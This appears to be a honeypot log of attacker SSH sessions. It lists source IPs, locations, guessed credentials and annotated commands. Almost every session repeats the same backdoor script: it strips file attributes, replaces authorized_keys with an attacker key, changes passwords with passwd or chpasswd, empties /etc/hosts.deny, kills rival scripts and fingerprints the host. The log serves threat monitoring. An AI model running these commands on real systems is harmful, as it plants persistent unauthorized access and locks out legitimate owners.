$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nhpPgHyzxuxCn\nhpPgHyzxuxCn"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nhpPgHyzxuxCn\nhpPgHyzxuxCn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bonsai_root (160.251.185.39) β€” Chiyoda City, Japan Β· 1 session Β· 19 cmds
2026-06-06 22:51 EDT Β· as root/P@ssw0rd2012
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:SLeshzgA7WwT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fika_root_2 (158.174.211.17) β€” OxelΓΆsund, Sweden Β· 1 session Β· 20 cmds
2026-06-06 22:50 EDT Β· as jupyter/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nXNJkHtkbDG2z\nXNJkHtkbDG2z"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nXNJkHtkbDG2z\nXNJkHtkbDG2z\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_38 (202.39.153.245) β€” Chang-hua, Taiwan Β· 1 session Β· 20 cmds
2026-06-06 18:51 EDT Β· as salih/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nqfN4cUacs1gn\nqfN4cUacs1gn"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nqfN4cUacs1gn\nqfN4cUacs1gn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_19 (34.215.10.49) β€” Portland, United States Β· 2 sessions Β· 40 cmds
2026-06-06 18:05 EDT Β· as admin/1234567, ubuntu/ubuntu.2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234567\nG6IURKFlkKAS\nG6IURKFlkKAS"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1234567\nG6IURKFlkKAS\nG6IURKFlkKAS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ubuntu.2025\nnRJwFaTx5vIu\nnRJwFaTx5vIu"|passwd|bash
$ echo "ubuntu.2025\nnRJwFaTx5vIu\nnRJwFaTx5vIu\n"|passwd
🎭 k-pop_root_8 (175.118.127.138) β€” Gangdong-gu, South Korea Β· 2 sessions Β· 40 cmds
2026-06-06 17:45 EDT Β· as test/asd, user/q1w2e3r4t5y6
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "asd\nwbdUw35C6l28\nwbdUw35C6l28"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "asd\nwbdUw35C6l28\nwbdUw35C6l28\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "q1w2e3r4t5y6\nyzlrkAyaJZIz\nyzlrkAyaJZIz"|passwd|bash
$ echo "q1w2e3r4t5y6\nyzlrkAyaJZIz\nyzlrkAyaJZIz\n"|passwd
🎭 samba_root_3 (177.30.64.65) β€” GoiΓ’nia, Brazil Β· 1 session Β· 20 cmds
2026-06-06 18:03 EDT Β· as admin/1234567
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234567\nGUZLx93ERuw1\nGUZLx93ERuw1"|passwd|bash
$ Enter new UNIX password:
$ echo "1234567\nGUZLx93ERuw1\nGUZLx93ERuw1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_32 (103.112.54.86) β€” Dhaka, Bangladesh Β· 2 sessions Β· 40 cmds
2026-06-06 17:42 EDT Β· as test/asd, user/q1w2e3r4t5y6
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "q1w2e3r4t5y6\nsW1pCTsr8BHN\nsW1pCTsr8BHN"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "q1w2e3r4t5y6\nsW1pCTsr8BHN\nsW1pCTsr8BHN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "asd\nsTa4Yd1UFlX0\nsTa4Yd1UFlX0"|passwd|bash
$ echo "asd\nsTa4Yd1UFlX0\nsTa4Yd1UFlX0\n"|passwd
🎭 cowboy (159.198.65.46) β€” Denver, United States Β· 1 session Β· 20 cmds
2026-06-06 16:24 EDT Β· as ego/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nO8uSDsJExxJC\nO8uSDsJExxJC"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nO8uSDsJExxJC\nO8uSDsJExxJC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_3 (39.130.240.253) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-06-06 16:21 EDT Β· as arp/arp
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "arp\nt5v7BAG2AtGq\nt5v7BAG2AtGq"|passwd|bash
$ Enter new UNIX password:
$ echo "arp\nt5v7BAG2AtGq\nt5v7BAG2AtGq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_8 (14.29.228.174) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-06-06 16:19 EDT Β· as steam/P@ssw0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\nRLntTH1vJWtg\nRLntTH1vJWtg"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nRLntTH1vJWtg\nRLntTH1vJWtg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_21 (97.93.43.157) β€” Pasadena, United States Β· 1 session Β· 19 cmds
2026-06-06 16:15 EDT Β· as root/qwerasdfZXCV!@#$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:d9ks7gmnlVpZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_8 (187.154.100.150) β€” Centro, Mexico Β· 4 sessions Β· 76 cmds
2026-05-10 08:08 EDT Β· as root/1998, root/Pakistan@123, root/vps2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:fq7R2Ulr0SVQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:3UdfXIx39GzL"|chpasswd|bash
$ echo "root:TZTuek98B6BA"|chpasswd|bash
$ echo "root:la0fREu5faom"|chpasswd|bash
🎭 phantom_root_6 (62.3.56.187) β€” 'Ayn Tamr, Iraq Β· 5 sessions Β· 99 cmds
2026-05-15 14:09 EDT Β· as ethan/123, mobile/mobile, root/linux123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "qwerty\nquHtKgMGKI0F\nquHtKgMGKI0F"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "qwerty\nquHtKgMGKI0F\nquHtKgMGKI0F\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "taba\nbBmeEMzsBqUw\nbBmeEMzsBqUw"|passwd|bash
$ echo "taba\nbBmeEMzsBqUw\nbBmeEMzsBqUw\n"|passwd
$ echo -e "123\nqzKdLV4pOD0S\nqzKdLV4pOD0S"|passwd|bash
